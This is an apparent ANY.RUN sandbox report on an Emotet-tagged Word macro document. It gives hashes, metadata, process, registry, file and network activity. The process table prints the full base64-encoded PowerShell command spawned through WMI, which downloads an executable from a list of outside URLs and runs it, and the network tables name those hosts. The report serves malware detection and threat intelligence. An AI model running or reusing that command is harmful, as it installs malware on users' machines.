Malware analysis 05W 2019 50945616 9.doc Malicious activity

Add for printing

File name:	05W 2019 50945616 9.doc
Full analysis:	https://app.any.run/tasks/5f1b05f4-f94d-4054-83e9-f6e7611fc459
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	September 19, 2019, 11:11:45
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open emotet-doc emotet generated-doc opendir
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Home, Home & Baby, Subject: Computers, Tools & Music, Author: Joey Fisher, Comments: Vision-oriented open-source RSS, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:34:00 2019, Last Saved Time/Date: Wed Sep 18 07:34:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:	99E4F76A98DC74244C3FF44C1E9AD2C2
SHA1:	E257620D5176C16B72BE53C5A8B84291171F9103
SHA256:	DAAC33D5D9165813437F7B9BC3D4A69CBEE3D3D4A6E007870C39542B16505C08
SSDEEP:	6144:7rGFNw3ypYo+puYNDl6iwOtPLkIP7NSU4jJntATfD4IxmW:7rGFNw3ypYo+puYNDl6iwoXP7NSU4Veb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- PowerShell script executed
  - powershell.exe (PID: 2200)
- Creates files in the user directory
  - powershell.exe (PID: 2200)
- Executed via WMI
  - powershell.exe (PID: 2200)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3484)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3484)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title:	Home, Home & Baby
Subject:	Computers, Tools & Music
Author:	Joey Fisher
Keywords:	-
Comments:	Vision-oriented open-source RSS
Template:	Normal.dotm
LastModifiedBy:	-
RevisionNumber:	1
Software:	Microsoft Office Word
TotalEditTime:	-
CreateDate:	2019:09:18 06:34:00
ModifyDate:	2019:09:18 06:34:00
Pages:	1
Words:	95
Characters:	547
Security:	None
CodePage:	Windows Latin 1 (Western European)
Company:	Kilback, Lind and Rowe
Lines:	4
Paragraphs:	1
CharCountWithSpaces:	641
AppVersion:	16
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	-
HeadingPairs:	Title 1
Manager:	Dicki
CompObjUserTypeLen:	32
CompObjUserType:	Microsoft Word 97-2003 Document

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3484	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05W 2019 50945616 9.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2200	powershell -encod JABVAE4ARgAxADkAWQA9ACcAcgBkAGkAaABXAHoAawBPACcAOwAkAE0ARwBGADkAMQBOAG0AIAA9ACAAJwA4ADIAOQAnADsAJABuAHMAQgB1AE0AbQBYADYAPQAnAEMAOQAxAGYAWQBsACcAOwAkAGIAaQBXAGEAdwBVAGoAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATQBHAEYAOQAxAE4AbQArACcALgBlAHgAZQAnADsAJABoAFoAQwByAGsAdQBGAD0AJwB0AFMAZgB0AEEAdAAnADsAJABsAG8AOABqAEEAdwBZAHcAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAGIAQwBMAEkAZQBuAHQAOwAkAFEAagBCAGwAUwBhAFAAbAA9ACcAaAB0AHQAcAA6AC8ALwBoAGkAZwBvAC4AbgBlAHQALwBKAHUAcAB2AE0AeQBoAE0ALwBAAGgAdAB0AHAAOgAvAC8AawB1AHIAcwB5AC0AYgBoAHAALQBzAGkAZQByAGEAZAB6AC4AcABsAC8AcAB1AGIALwBkAEQAcQBrAGUAWABiAC8AQABoAHQAdABwADoALwAvAGwAZQBzAGEAbgB0AGkAdgBpAHIAdQBzAC4AbgBlAHQALwBjAHMAcwAvAHEAagAxADkAOQAtAGoAMwAxADEALQAxADIANgA3ADUALwBAAGgAdAB0AHAAOgAvAC8AbABlAGEAZgBkAGUAcwBpAGcAbgAuAGoAcAAvAGkAbQBnAGUALwBRAGYARgBQAFoARABlAE8ALwBAAGgAdAB0AHAAOgAvAC8AdABwAGMALgBoAHUALwBhAHIAbABpAHMAdABhAC8ATwBtAHcAbQBJAFEAawBnAFAALwAnAC4AIgBzAGAAcABsAEkAdAAiACgAJwBAACcAKQA7ACQAZABYAGQANQBPAGwAZAA5AD0AJwBhAG8AQwA5AE8AMAB6AEwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEkANABLAGMAXwBwACAAaQBuACAAJABRAGoAQgBsAFMAYQBQAGwAKQB7AHQAcgB5AHsAJABsAG8AOABqAEEAdwBZAHcALgAiAEQAYABPAFcATgBMAG8AYQBkAGYAaQBgAEwAZQAiACgAJABJADQASwBjAF8AcAAsACAAJABiAGkAVwBhAHcAVQBqAGkAKQA7ACQARQBIAFMAcABjAGYAaQBtAD0AJwBDAFAASAB3ADEATgBJACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAYgBpAFcAYQB3AFUAagBpACkALgAiAEwARQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAxADAANAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgB0ACIAKAAkAGIAaQBXAGEAdwBVAGoAaQApADsAJABkAHQAQwA4AGsARgBGADYAPQAnAHcAegBuADMAbwBiAEYAJwA7AGIAcgBlAGEAawA7ACQAbABHADIAVQBFAHUAUQA9ACcARwBBADIAUAB2AFMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQBWAEUAVwBhAGsAaQA9ACcATABtAFAASABaAEkAVQAnAA==	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 397

Read events

933

Write events

459

Delete events

Modification events


(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:	write	Name:	"<$
Value: 223C24009C0D0000010000000000000000000000
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1033
Value: Off
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:	write	Name:	1033
Value: On
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:	write	Name:	WORDFiles
Value: 1328742430
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:	write	Name:	ProductFiles
Value: 1328742544
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:	write	Name:	ProductFiles
Value: 1328742545
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:	write	Name:	MTTT
Value: 9C0D000024568110DB6ED50100000000
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:	write	Name:	z=$
Value: 7A3D24009C0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:	delete value	Name:	z=$
Value: 7A3D24009C0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:	(3484) WINWORD.EXE	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR9CA2.tmp.cvr		—
		MD5:—	SHA256:—
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$W 2019 50945616 9.doc		pgc
		MD5:5BC9813CDBD0196EDFBB65811BFC66FD	SHA256:C8D22C6B25F67C93365CE492A6F409C502787719E7864B01D2D42F272851EEDA
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CEA27B4.wmf		wmf
		MD5:D6310E6E3888ED9B4AE53766B1739C79	SHA256:AC5A634E25B4A32337449399091554B27BEDA3B530910EA64FF50D320A5F16D4
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E922B640.wmf		wmf
		MD5:630D8D96969A28D5F6F503E7D192259E	SHA256:4E85FF6930CF1B5A68B7A098E9AF295AA9DA48B227D21FF668C23CCD28E1E95F
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D040FE8.wmf		wmf
		MD5:566C8F68D1200C373A8AC125AA1503C6	SHA256:4D40C3CE5E07E0978D048DD197F9964D5921682A8CC209DC9624561E2773DA83
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8449BC25.wmf		wmf
		MD5:4413481E449BA6701FEC0D367DDBE540	SHA256:49640C7F539716C786C3ED6A4BFA656DD23765933942CCC9FBB1735F1CF8D5DD
3484	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:CD0929FDC6545C244CB285B22558DE27	SHA256:4F0C83A3FE87834B4FE11EE04E1367F736F25C3034A92327199430EDC9366CAD
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7E726D2D.wmf		wmf
		MD5:702FFDD5270DAF825ACA8483BE3933ED	SHA256:3514D24DD666A390C3490FF7D7947D17D8EA82C843037EAFEEE38E6BF3D0D707
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26E4D490.wmf		wmf
		MD5:7ACBEEC139B6086CAC42605BB6D34455	SHA256:9B5A1E1CADA113B5BB8B06CA8EF2FACACC30949208DEF7B9988CFEA62E64FF7E
3484	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D21522DC.wmf		wmf
		MD5:7D4DA599760614801D4846614B622D42	SHA256:1E5321273582605D021B56229F64D5145C3E12268F13D4902FF54FF90F9E42FE

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2200	powershell.exe	GET	—	217.13.104.181:80	http://www.tpc.hu/arlista/OmwmIQkgP/	HU	—	—	suspicious
2200	powershell.exe	GET	301	217.13.104.181:80	http://tpc.hu/arlista/OmwmIQkgP/	HU	—	—	suspicious
2200	powershell.exe	GET	404	59.106.13.72:80	http://leafdesign.jp/imge/QfFPZDeO/	JP	html	212 b	whitelisted
2200	powershell.exe	GET	404	79.96.169.123:80	http://kursy-bhp-sieradz.pl/pub/dDqkeXb/	PL	html	183 b	suspicious
2200	powershell.exe	GET	404	202.181.99.31:80	http://higo.net/JupvMyhM/	JP	html	207 b	suspicious
2200	powershell.exe	GET	404	64.34.67.250:80	http://lesantivirus.net/css/qj199-j311-12675/	US	html	315 b	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2200	powershell.exe	79.96.169.123:80	kursy-bhp-sieradz.pl	home.pl S.A.	PL	suspicious
2200	powershell.exe	59.106.13.72:80	leafdesign.jp	SAKURA Internet Inc.	JP	unknown
2200	powershell.exe	217.13.104.181:80	tpc.hu	Invitech Megoldasok Zrt.	HU	suspicious
2200	powershell.exe	64.34.67.250:80	lesantivirus.net	Peer 1 Network (USA) Inc.	US	suspicious
2200	powershell.exe	202.181.99.31:80	higo.net	SAKURA Internet Inc.	JP	suspicious

DNS requests

Domain	IP	Reputation
higo.net	202.181.99.31	suspicious
kursy-bhp-sieradz.pl	79.96.169.123	suspicious
lesantivirus.net	64.34.67.250	suspicious
leafdesign.jp	59.106.13.72	unknown
tpc.hu	217.13.104.181	suspicious
www.tpc.hu	217.13.104.181	unknown

Threats

No threats detected

Add for printing

No debug info

General Info

05W 2019 50945616 9.doc

99E4F76A98DC74244C3FF44C1E9AD2C2

E257620D5176C16B72BE53C5A8B84291171F9103

DAAC33D5D9165813437F7B9BC3D4A69CBEE3D3D4A6E007870C39542B16505C08

6144:7rGFNw3ypYo+puYNDl6iwOtPLkIP7NSU4jJntATfD4IxmW:7rGFNw3ypYo+puYNDl6iwoXP7NSU4Veb

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

PowerShell script executed

Creates files in the user directory

Executed via WMI

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings